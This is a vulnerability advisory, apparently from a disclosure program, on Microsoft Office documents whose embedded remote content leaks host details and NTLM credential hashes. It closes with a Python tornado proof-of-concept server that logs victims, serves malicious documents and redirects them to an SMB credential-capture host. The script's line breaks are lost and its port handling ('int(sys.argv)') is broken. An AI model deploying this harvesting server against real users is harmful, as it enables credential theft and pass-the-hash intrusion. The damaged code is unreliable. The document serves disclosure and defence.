The following advisory describes an information disclosure found in Microsoft Office versions 2010, 2013, and 2016.
Microsoft Office is: “Whether you’re working or playing, Microsoft is here to help. We’re the company that created Microsoft Office, including Office 365 Home, Office 365 Personal, Office Home & Student 2016, Office Home & Business 2016, and Office Professional 2016. You can also get Office for Mac. Whatever your needs—whether professional or simply for fun—we’ve got you covered. The powerful software in Microsoft Office 2013 remains in Microsoft Office 2016.”
An independent security researcher, Björn Ruytenberg, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Microsoft was informed of the vulnerability, to which they response with:
“Upon investigation, we have determined that this submission does not meet the bar for security servicing. Unfortunately images are commonly used in emails and other locations that are sourced from external sites, those sites can use that request for basic tracking information. Your report about SMBTrap is also a well documented publicly disclosed item and would not meet the bar. In addition the PoC requires a user to disable their security, specifically the Protected View, stating that they trust the source.
As such, this email thread has been closed and will no longer be monitored.”
The Microsoft Office document format allows for embedding remote content, such as images. This remote content can be hosted on any HTTP server. Upon opening such a document, embedded remote content is downloaded and shown. A vulnerability exists that enables exploiting this mechanism to disclose information to an attacker-controlled remote server.
An attacker can send to the victim a malicious Office file with embedded remote content.
When the victim will open the file, an HTTP request will be sent to the attacker controlled web-server.
The vulnerability allows the attacker to redirect the HTTP request to an SMB connection an get the following information from the victims machine:
- Victim host environment information
- Host IP address (*)
- Windows version
- Office version
- Installed .NET Framework runtimes
- Presence of the Tablet PC subsystem (**)
- Windows user credentials: username and password NTLM hash. This allows an attacker to:
- Mount a “Pass-the-Hash” attack: the username and hash can be used to logon to a third-party host that the victim is authorized to access.
- Derive the originating plaintext password, using bruteforcing tools (***)
(*) The IP address exposed to the attacker’s server depends on the document payload. If the payload references an external host, i.e. outside the local network, the victim host’s external IP address will be exposed to the attacker server. Similarly, if referencing an internal server, the victim host’s internal IP address will be exposed to the attacker server.
(**) If present, the Tablet PC substring likely indicates that the victim’s machine is a tablet device, or hybrid equipment that provides a touch screen.
(***) The Exploit section further discusses these scenarios.
The vulnerability can be exploited through:
- Opening a specially-crafted, local MS Office document (DOCX, XLSX) that embeds the malicious content. No additional user interaction is required.
- Opening a specially-crafted MS Office document, downloaded from a remote server. In this scenario, disabling “Protected View”, i.e. clicking “Enable Editing”, is required to exploit the vulnerability. However, enabling macros is _not_ required.
Proof of Concept
import tornado.ioloop import tornado.web import string import random import os.path # Microsoft Office Information Disclosure Vulnerability # # This Python script hosts an HTTP server, fulfulling three purposes: # - Victim host info logging: # Logs the User-Agent exposed by the victim machine, including the following host environment info: # Windows version, Office version, installed .NET runtime versions, presence of Tablet PC subsystem # - Serves the malicious Office documents: # Note: this is to demonstrate a remote exploitation scenario. The documents may be hosted elsewhere, or distributed through other means (e.g. email). # - Redirects the user (HTTP 302) to a malicious SMB server that captures Windows user credentials (e.g. SMBtrap). smbServerAddr = "IP" # Host running SMBtrap class HandleRequest(tornado.web.RequestHandler): def get(self): print self.request.remote_ip + ": HTTP GET '"+ self.request.path + "'" print self.request.remote_ip + ": User-Agent: " + self.request.headers["User-Agent"] if self.request.path == "/favicon.ico": self.set_status(404, "Not Found") elif self.request.path.startswith('/poc_'): officePocPath = os.getcwd() + self.request.path if self.request.path.endswith('.docx') == True: self.set_header("Content-Type","application/vnd.openxmlformats-officedocument.wordprocessingml.document") else: self.set_header("Content-Type","application/vnd.openxmlformats-officedocument.spreadsheetml.sheet") if os.path.exists(officePocPath) == True: print " Serving " + self.request.path with open(officePocPath, 'rb') as f: data = f.read() self.write(data) self.finish() else: print " Cannot serve " + self.request.path + ": file not found in script working directory." else: print " Sending HTTP 302 file://///" + smbServerAddr +"/some/path" self.set_status(302, "Found") self.redirect("file://///" + smbServerAddr +"/some/path") application = tornado.web.Application([ (r".*", HandleRequest), ]) if __name__ == "__main__": import sys port = 80 if len(sys.argv) > 2: port = int(sys.argv) application.listen(port) tornado.ioloop.IOLoop.instance().start()